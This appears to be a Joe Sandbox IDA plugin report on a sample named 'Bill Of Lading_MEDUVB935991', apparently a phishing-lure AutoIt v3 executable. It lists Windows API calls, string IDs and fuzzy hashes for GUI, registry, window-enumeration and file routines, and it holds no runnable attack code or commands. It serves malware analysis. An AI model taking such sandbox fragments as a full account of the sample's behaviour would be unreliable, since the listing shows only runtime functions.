• SelectObject.GDI32(?,?), ref: 00433E29
• InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
• RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
• GetWindowLongW.USER32 ref: 00433E8A
• SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
• GetWindowTextW.USER32(00000000,00000000,00000105), ref: 00433EE1
• InflateRect.USER32(?,000000FD,000000FD), ref: 00433F13
• DrawFocusRect.USER32(?,?), ref: 00433F1F
• GetSysColor.USER32(00000011), ref: 00433F2E
• SetTextColor.GDI32(?,00000000), ref: 00433F36
• DrawTextW.USER32(?,?,000000FF,?,?), ref: 00433F4E
• SelectObject.GDI32(?,?), ref: 00433F63
• DeleteObject.GDI32(?), ref: 00433F70
• SelectObject.GDI32(?,?), ref: 00433F78
• DeleteObject.GDI32(00000000), ref: 00433F7B
• SetTextColor.GDI32(?,?), ref: 00433F83
• SetBkColor.GDI32(?,?), ref: 00433F8F
Similarity
• API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
• String ID:
• API String ID: 1582027408-0
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AFC2
• RegCreateKeyExW.ADVAPI32(?,?,00000000,004848E8,00000000,?,00000000,?,?,?,?,?), ref: 0046B01C
• RegCloseKey.ADVAPI32(?), ref: 0046B069
Strings
Similarity
• API ID: CloseConnectCreateRegistry
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
• API String ID: 3217815495-966354055
APIs
• GetCursorPos.USER32(?), ref: 00456692
• GetDesktopWindow.USER32 ref: 004566AA
• GetWindowRect.USER32(00000000), ref: 004566B1
• GetWindowLongW.USER32(?,000000F0), ref: 0045670D
• GetWindowLongW.USER32(?,000000F0), ref: 00456720
• DestroyWindow.USER32(?), ref: 00456731
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456779
• SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00456797
• SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567C0
• SendMessageW.USER32(?,00000421,?,?), ref: 004567D8
• SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004567EE
• IsWindowVisible.USER32(?), ref: 00456812
• SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 0045682E
• SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 00456843
• GetWindowRect.USER32(?,?), ref: 0045685C
• MonitorFromPoint.USER32(?,?,00000002), ref: 00456880
• GetMonitorInfoW.USER32 ref: 00456894
• CopyRect.USER32(?,?), ref: 004568A8
• SendMessageW.USER32(?,00000412,00000000), ref: 0045690A
Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$MessageSend$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                                      • String ID: ($,$tooltips_class32
                                                                                                                      • API String ID: 541082891-3320066284
                                                                                                                      • Opcode ID: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                                                                      • Instruction ID: 3987ef5f26dee50c6234681dd74380f3ee0746d74ffcadc96223edc745891050
                                                                                                                      • Opcode Fuzzy Hash: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                                                                      • Instruction Fuzzy Hash: 33B18EB0604341AFD714DF64C984B6BB7E5EF88704F408D2DF989A7292D778E848CB5A
APIs
• _wcslen.LIBCMT ref: 00454DCF
• _wcslen.LIBCMT ref: 00454DE2
• __wcsicoll.LIBCMT ref: 00454DEF
• _wcslen.LIBCMT ref: 00454E04
• __wcsicoll.LIBCMT ref: 00454E11
• _wcslen.LIBCMT ref: 00454E24
• __wcsicoll.LIBCMT ref: 00454E31
  • Part of subcall function 004115D0: __wcsicmp_l.LIBCMT ref: 00411657
• LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00454E65
• LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,?,?,?,?,?,?,?,00000000), ref: 00454E79
• LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454EB7
• LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00454EFB
• LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454F2C
• FreeLibrary.KERNEL32(00000000), ref: 00454F37
• ExtractIconExW.SHELL32(?,00000000,00000000,?,00000001), ref: 00454F94
• DestroyIcon.USER32(?), ref: 00454FA2
• SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00454FC0
• SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00454FCC
• MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00454FF1
Similarity
• API ID: Load$Image_wcslen$__wcsicoll$IconLibraryMessageSend$DestroyExtractFreeMoveWindow__wcsicmp_l
• String ID: .dll$.exe$.icl
• API String ID: 2511167534-1154884017
• Opcode ID: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
• Instruction ID: 777b7c61fe84a0ac0f88e3bb9536c5d4e291b97e4b5026f6b39318954af55ba4
• Opcode Fuzzy Hash: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
• Instruction Fuzzy Hash: D461D9711043016AE620DF659D85F7B73ECEF84B0AF00481EFE81D5182E7B9A989C77A
APIs
• GetFileVersionInfoSizeW.VERSION(?,?), ref: 00436B4E
• GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00436B73
• _wcslen.LIBCMT ref: 00436B79
• _wcscpy.LIBCMT ref: 00436B9F
• _wcscat.LIBCMT ref: 00436BC0
• VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00436BE7
• _wcscat.LIBCMT ref: 00436C2A
• _wcscat.LIBCMT ref: 00436C31
• __wcsicoll.LIBCMT ref: 00436C4B
• _wcsncpy.LIBCMT ref: 00436C62
Similarity
• API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
• API String ID: 1503153545-1459072770
• Opcode ID: 4bf5914395717010b0ea9e2d69638f6034391d2624482ee6cf2f9dbb9f61e865
• Instruction ID: f4118b49cd66f9fee818cdfc0bae26735a4a754b0a3131160812af9443992caa
• Opcode Fuzzy Hash: 4bf5914395717010b0ea9e2d69638f6034391d2624482ee6cf2f9dbb9f61e865
• Instruction Fuzzy Hash: B54115B264020137D200B7269C83EFF735CDE99715F54091FFE45A2253FA2EA69642BE
APIs
  • Part of subcall function 004431E0: __time64.LIBCMT ref: 004431EA
• _fseek.LIBCMT ref: 004527FC
• __wsplitpath.LIBCMT ref: 0045285C
• _wcscpy.LIBCMT ref: 00452871
• _wcscat.LIBCMT ref: 00452886
• __wsplitpath.LIBCMT ref: 004528B0
• _wcscat.LIBCMT ref: 004528C8
• _wcscat.LIBCMT ref: 004528DD
• __fread_nolock.LIBCMT ref: 00452914
• __fread_nolock.LIBCMT ref: 00452925
• __fread_nolock.LIBCMT ref: 00452944
• __fread_nolock.LIBCMT ref: 00452955
• __fread_nolock.LIBCMT ref: 00452976
• __fread_nolock.LIBCMT ref: 00452987
• __fread_nolock.LIBCMT ref: 00452998
• __fread_nolock.LIBCMT ref: 004529A9
  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
  • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
  • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
• __fread_nolock.LIBCMT ref: 00452A39
Similarity
• API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
• String ID:
• API String ID: 2054058615-0
• Opcode ID: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
• Instruction ID: 66779ec6e5012556871fefb3c18d5d4f0449fb8b445ab61f685bb60241e2a5ae
• Opcode Fuzzy Hash: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
• Instruction Fuzzy Hash: 16C14EB2508340ABD320DF65C881EEBB7E8EFC9714F444D2FF68987241E6799544CBA6
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
• Opcode ID: 832d7dfe82571d46151d64c4ba74b7ae12496bc5cddea04242c0c379dd164914
• Instruction ID: a4e6889c8706d2a682ad3cc8acca51b009283e1ae9b51da70db0806919efebf9
• Opcode Fuzzy Hash: 832d7dfe82571d46151d64c4ba74b7ae12496bc5cddea04242c0c379dd164914
• Instruction Fuzzy Hash: 95C104723403416BF3209B64DC46FBBB794EB95321F04453FFA45D62C1EBBA9409876A
APIs
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
• GetWindowRect.USER32(?,?), ref: 004701EA
• GetClientRect.USER32(?,?), ref: 004701FA
• GetSystemMetrics.USER32(00000007), ref: 00470202
• GetSystemMetrics.USER32(00000008), ref: 00470216
• GetSystemMetrics.USER32(00000004), ref: 00470238
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047026B
• GetSystemMetrics.USER32(00000007), ref: 00470273
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004702A0
• GetSystemMetrics.USER32(00000008), ref: 004702A8
• GetSystemMetrics.USER32(00000004), ref: 004702CF
• SetRect.USER32(?,00000000,00000000,?,?), ref: 004702F1
• AdjustWindowRectEx.USER32(?,?,00000000,000000FF), ref: 00470304
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 0047033E
• SetWindowLongW.USER32(00000000,000000EB,?), ref: 00470356
• GetClientRect.USER32(?,?), ref: 00470371
• GetStockObject.GDI32(00000011), ref: 00470391
• SendMessageW.USER32(?,00000030,00000000), ref: 0047039D
• SetTimer.USER32(00000000,00000000,00000028,Function_00061E7F), ref: 004703C4
Similarity
• API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
• String ID: AutoIt v3 GUI
• API String ID: 867697134-248962490
• Opcode ID: 0d702e1f111dc4b461eb7f98f3a5a74387d5f37c8fb6fd827a42ca67ae032642
• Instruction ID: 96ed3905d942d8c5c267f8207effb08aff50268186fc7250a269a1908d1679c9
• Opcode Fuzzy Hash: 0d702e1f111dc4b461eb7f98f3a5a74387d5f37c8fb6fd827a42ca67ae032642
• Instruction Fuzzy Hash: 27B19F71205301AFD324DF68DD45B6BB7E4FB88710F108A2EFA9587290DBB5E844CB5A
APIs
• SetWindowPos.USER32(004A83D8,00000000,00000000,00000000,00000000,00000000,00000013,004A83D8,?,?), ref: 0044880A
                                                                                                                      Similarity
                                                                                                                      • API ID: Window
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 2353593579-4108050209
                                                                                                                      • Opcode ID: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                                                                      • Instruction ID: 13976ff69904029c6bcd7d6129a783336058688c161485e0dcc644b2654616cc
                                                                                                                      • Opcode Fuzzy Hash: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                                                                      • Instruction Fuzzy Hash: 94B19DB02443419FF324CF14C889BABBBE4EB89744F14491EF991972D1DBB8E845CB5A
                                                                                                                      APIs
                                                                                                                      • GetSysColor.USER32 ref: 0044A11D
                                                                                                                      • GetClientRect.USER32(?,?), ref: 0044A18D
                                                                                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A1A6
                                                                                                                      • GetWindowDC.USER32(?), ref: 0044A1B3
                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 0044A1C6
                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 0044A1D6
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 0044A1EC
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0044A207
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 0044A216
                                                                                                                      • GetSysColor.USER32(00000005), ref: 0044A21E
                                                                                                                      • GetWindowDC.USER32 ref: 0044A277
                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A28A
                                                                                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 0044A29F
                                                                                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 0044A2B4
                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 0044A2D0
                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 0044A2D8
                                                                                                                      • SetTextColor.GDI32(00000000,?), ref: 0044A2F6
                                                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 0044A30A
                                                                                                                      • GetStockObject.GDI32(00000005), ref: 0044A312
                                                                                                                      • SetBkColor.GDI32(00000000,00000000), ref: 0044A328
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1744303182-0
                                                                                                                      • Opcode ID: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                                                                      • Instruction ID: f407f88e1fc9bdd08975b2e96734b256c85d8f08b0ead5e1f8dbf5832e348edb
                                                                                                                      • Opcode Fuzzy Hash: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                                                                      • Instruction Fuzzy Hash: AD6148315442016BE3209B388C88BBFB7A4FB49324F54079EF9A8973D0D7B99C51D76A
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsicoll$__wcsnicmp
                                                                                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                      • API String ID: 790654849-1810252412
                                                                                                                      • Opcode ID: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                                                                      • Instruction ID: 1b62209f2aa4de5792947d5a3aa61dcd1c874d3672784017b8f4b2c72f71c34c
                                                                                                                      • Opcode Fuzzy Hash: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                                                                      • Instruction Fuzzy Hash: 7A3193B1644301A7CA00FA61DC83F5B73A85F54759F100A3FB955B61D6FA6CEA0C862F
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitVariant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1927566239-0
                                                                                                                      • Opcode ID: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                                                                      • Instruction ID: b17386a2766a1a739d91313a8bf0106a5dd250ff49ec0cac6ee5761d63536315
                                                                                                                      • Opcode Fuzzy Hash: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                                                                      • Instruction Fuzzy Hash: 87A1F5766146019FC300EF65D88499FB7AAFF85315F408D3EFA49C3211D77AD4098BAA
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                      • GetForegroundWindow.USER32(?,?), ref: 0046D7C1
                                                                                                                      • GetForegroundWindow.USER32 ref: 0046DBA4
                                                                                                                      • IsWindow.USER32(?), ref: 0046DBDE
                                                                                                                      • GetDesktopWindow.USER32 ref: 0046DCB5
                                                                                                                      • EnumChildWindows.USER32(00000000), ref: 0046DCBC
                                                                                                                      • EnumWindows.USER32(00460772,?), ref: 0046DCC4
                                                                                                                        • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop
                                                                                                                      • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                      • API String ID: 1322021666-1919597938
                                                                                                                      • Opcode ID: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                                                                      • Instruction ID: 252cd24da08a8cddfda52e39780f3f39bafd894638fb43d2866a45805a666b3e
                                                                                                                      • Opcode Fuzzy Hash: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                                                                      • Instruction Fuzzy Hash: 96F1C571D143409BCB00EF61C881EAB73A4BF95308F44496FF9456B286E77DE909CB6A
                                                                                                                      APIs
                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 0045DED4
                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 0045DEE4
                                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0045DEF0
                                                                                                                      • _wcsncpy.LIBCMT ref: 0045DF0F
                                                                                                                      • __wsplitpath.LIBCMT ref: 0045DF54
                                                                                                                      • _wcscat.LIBCMT ref: 0045DF6C
                                                                                                                      • _wcscat.LIBCMT ref: 0045DF7E
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0045DF93
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFA7
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFE5
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFFB
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0045E00D
                                                                                                                      • _wcscpy.LIBCMT ref: 0045E019
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0045E05F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentDirectory$Time$File$Local_wcscat$System__wsplitpath_wcscpy_wcsncpy
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 3201719729-438819550
                                                                                                                      • Opcode ID: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                                                                                                                      • Instruction ID: 9ef8ac46b2ec3f8a2b66e183c5d6435db2730cdd54c1860218fefef83dfd89d7
                                                                                                                      • Opcode Fuzzy Hash: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                                                                                                                      • Instruction Fuzzy Hash: D061A7B25043049BC724EF65C881E9FB3E8AF94704F048E1EF98987241DB79E949CB96
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: __wcsicoll$IconLoad
• String ID: blank$info$question$stop$warning
• API String ID: 2485277191-404129466
• Opcode ID: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
• Instruction ID: 3fdcc892c2a25cebf9aff257507665a297d4e16c4260cb8f6e9492a672fb13e0
• Opcode Fuzzy Hash: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
• Instruction Fuzzy Hash: CB2128B6B08301A7D610A725BC05FDF27489FA8365F004C2BF941E2283F3A8A45583BD
APIs
• CompareStringW.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428611
• GetLastError.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428627
• strncnt.LIBCMT ref: 00428646
• strncnt.LIBCMT ref: 0042865A
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: strncnt$CompareErrorLastString
• String ID:
• API String ID: 1776594460-0
• Opcode ID: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
• Instruction ID: 056e5a993d73ec50dc3c8e072878bb631c9b69e1f80941a2a69bbd8adeb14d7f
• Opcode Fuzzy Hash: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
• Instruction Fuzzy Hash: 0DA1B131B01225AFDF219F61EC41AAF7BB6AF94340FA4402FF81196251DF3D8891CB58
APIs
• LoadIconW.USER32(?,00000063), ref: 004545DA
• SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004545EC
• SetWindowTextW.USER32(?,?), ref: 00454606
• GetDlgItem.USER32(?,000003EA), ref: 0045461F
• SetWindowTextW.USER32(00000000,?), ref: 00454626
• GetDlgItem.USER32(?,000003E9), ref: 00454637
• SetWindowTextW.USER32(00000000,?), ref: 0045463E
• SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00454663
• SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 0045467D
• GetWindowRect.USER32(?,?), ref: 00454688
• SetWindowTextW.USER32(?,?), ref: 004546FD
• GetDesktopWindow.USER32 ref: 00454708
• GetWindowRect.USER32(00000000), ref: 0045470F
• MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 00454760
• GetClientRect.USER32(?,?), ref: 0045476F
• PostMessageW.USER32(?,00000005,00000000,?), ref: 0045479E
• SetTimer.USER32(?,0000040A,?,00000000), ref: 004547E9
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
• String ID:
• API String ID: 3869813825-0
• Opcode ID: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
• Instruction ID: 4e77de65cc6986e78e6be143d0a4b9e7f39e78804b6f4fc71fe9e35dfcfd5046
• Opcode Fuzzy Hash: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
• Instruction Fuzzy Hash: 8C616D71604701AFD320DF68CD88F2BB7E8AB88709F004E1DF98697691D7B8E849CB55
APIs
• LoadCursorW.USER32(00000000,00007F8A), ref: 00458D2D
• LoadCursorW.USER32(00000000,00007F00), ref: 00458D3A
• LoadCursorW.USER32(00000000,00007F03), ref: 00458D47
• LoadCursorW.USER32(00000000,00007F8B), ref: 00458D54
• LoadCursorW.USER32(00000000,00007F01), ref: 00458D61
• LoadCursorW.USER32(00000000,00007F81), ref: 00458D6E
• LoadCursorW.USER32(00000000,00007F88), ref: 00458D7B
• LoadCursorW.USER32(00000000,00007F80), ref: 00458D88
• LoadCursorW.USER32(00000000,00007F86), ref: 00458D95
• LoadCursorW.USER32(00000000,00007F83), ref: 00458DA2
• LoadCursorW.USER32(00000000,00007F85), ref: 00458DAF
• LoadCursorW.USER32(00000000,00007F82), ref: 00458DBC
• LoadCursorW.USER32(00000000,00007F84), ref: 00458DC9
